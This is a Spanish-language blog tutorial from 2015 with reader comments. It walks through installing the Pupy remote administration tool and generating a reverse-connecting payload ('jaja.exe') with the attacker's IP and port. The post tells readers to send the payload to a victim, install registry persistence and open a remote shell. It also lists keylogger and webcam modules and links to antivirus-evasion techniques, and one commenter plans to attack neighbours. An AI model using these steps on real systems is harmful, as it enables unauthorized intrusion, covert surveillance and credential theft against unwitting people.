jueves, 1 de octubre de 2015

Pupy - Remote Administration Tool


Saludos mis queridos lectores en esta oportunidad vengo a presentar una nueva herramienta salida del horno,llamada Pupy la cual tiene como función infectar ordenadores al estilo de msfconsole pero con un estilo mas complejo, Pupy utiliza inyección dll reflexiva y no deja rastros en el disco.

Módulos implementadas:



  • migrar (Windows)
  • entre la inyección arquitectura de procesos también trabaja (x86> x64 y x64-> x86)
  • keylogger (Windows)
  • persistencia (Windows)
  • captura de pantalla (Windows)
  • instantánea cámara web (Windows)
  • ejecución de comandos
  • descargar
  • subir
  • Proxy socks5
  • reenvío de puerto local
  • shell interactiva (cmd.exe, / bin / sh, ...)
  • shell python interactiva
  • exec shellcode (gracias a @ byt3bl33d3r)

Descarga:


Antes de instalar Pupy debemos instalar  el complemento rpyc para poder ejecutar el servidor de nuestro pupy y arranque correctamente, entonces pasaremos a descargarlo e instalarlo.

root@kali:~/rpyc-master# pip install rpyc


Como vemos ha sido instalado correctamente los repertorios correctamente, entonces lo que haremos sera descargar el pupy y luego lo extraeremos 


root@kali:~# wget https://github.com/n1nj4sec/pupy/archive/master.zip

root@kali:~# unzip master.zip


luego de ello, entraremos a la carpeta y ejecutaremos el archivo : pupygen.py

root@kali:~/pupy-master/pupy# python pupygen.py -h














como vemos nos arroja las opciones donde podemos crear nuestro payload, hay diferentes arquitecturas para compatibilidad de los ejecutables,la opción de conexión de nuestra IP y el puerto de escucha, entonces vamos 

python pupygen.py -t exe_x86 -o jaja.exe -p 443 192.168.179.129

el nombre del archivo malioso es jaja.exe ,xD no es nada complicado solo ejecutamos el tipo de arquitectura que deseamos compilar el ejecutable y nuestra ip y el puerto, luego de ello configuramos el archivo de arranque del servidor de pupy server por nano en la terminal.

nano pupy.conf 


















el la primera linea añadir la IP de ustedes donde añadieron anteriormente en el payload de pupy, igualmente el mismo puerto.

como vemos ya tenemos cargando nuestro servidor para recibir las conexiones entrantes de nuestras victimas, ahora solo mandaríamos el archivo nuestra victima.

Una ves que nuestra victima ejecute el archivo, automáticamente tenemos su sesión meterpreter corriendo como vemos en la siguiente imagen.

para poder ver los comandos añaden help como en la imagen anterior.

para ver nuestros clientes que están infectados y la info de los sistemas, en mi caso como es solo un objetivo nos arroja solamente 2 de uno.

para poder ejecutar nuestra opciones de los módulos que podemos interactuar con nuestro sistema comprometido con el comando : list_modules


lo que haremos sera crear nuestro backdoor persistente y que se ejecute cada ves que se apage el equipo de la victima, utilizaremos run persistence -m registry , en la consola del meterpreter.

para ejecutar cualquier proceso debemos añadir primero run y luego el comando de ejecución como vemos en la imagen, ahora ejecutare el siguiente comando, para conectarme a la terminal de cmd de windows.


Si deseas ponerlo indetectable  el ejecutable, puedes hacerlo con shellter ya que hace la misma función de un meterpreter para pupy.

link del articulo :

http://backtrack-omar.blogspot.com/2015/10/evadiendo-av-codificando-payloads-con.html


Ante mano les deseo un saludo a todos mis fieles lectores de mi humilde blog!
Happy Hacking CyberPunks!!!



7 comentarios:

  1. super bien haora a molestar mis vecinos jajajaja

    ResponderEliminar
  2. y como se aria en redes externa a la lan?

    ResponderEliminar
    Respuestas
    1. te puedo pedir,y me ayudes como ejecuto el keylogger,tambien se ejecuta con run,y despuex que,hay quede perdido

      Eliminar
    2. Lo primero necesitas abrir tu puerto de escucha en tu rooter, puedes añadir --help para que te puedas guiar, saludos

      Eliminar
  3. La herramienta me ha servido de mucho durante mis pruebas con Windows XP, 7 Y 8.1. Tuve la misma duda. ¿Cómo sería la configuración para el ataque externo? En mi caso tengo que llamar al ISP para que me abra los puertos. Pero la solución es la misma. Gracias por el tutorial.
    De hecho me gustaría pedir tu atorización para hacer un video de una prueba de ataque y mostrarles el procedimiento a algúnos colegas y a los usuarios en general. Saudos!

    ResponderEliminar
    Respuestas
    1. Que tal compañero un placer, claro no hay problema bro el conocimiento es libre tiene mi autorización, un fuerte abrazo, saludos

      Eliminar

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares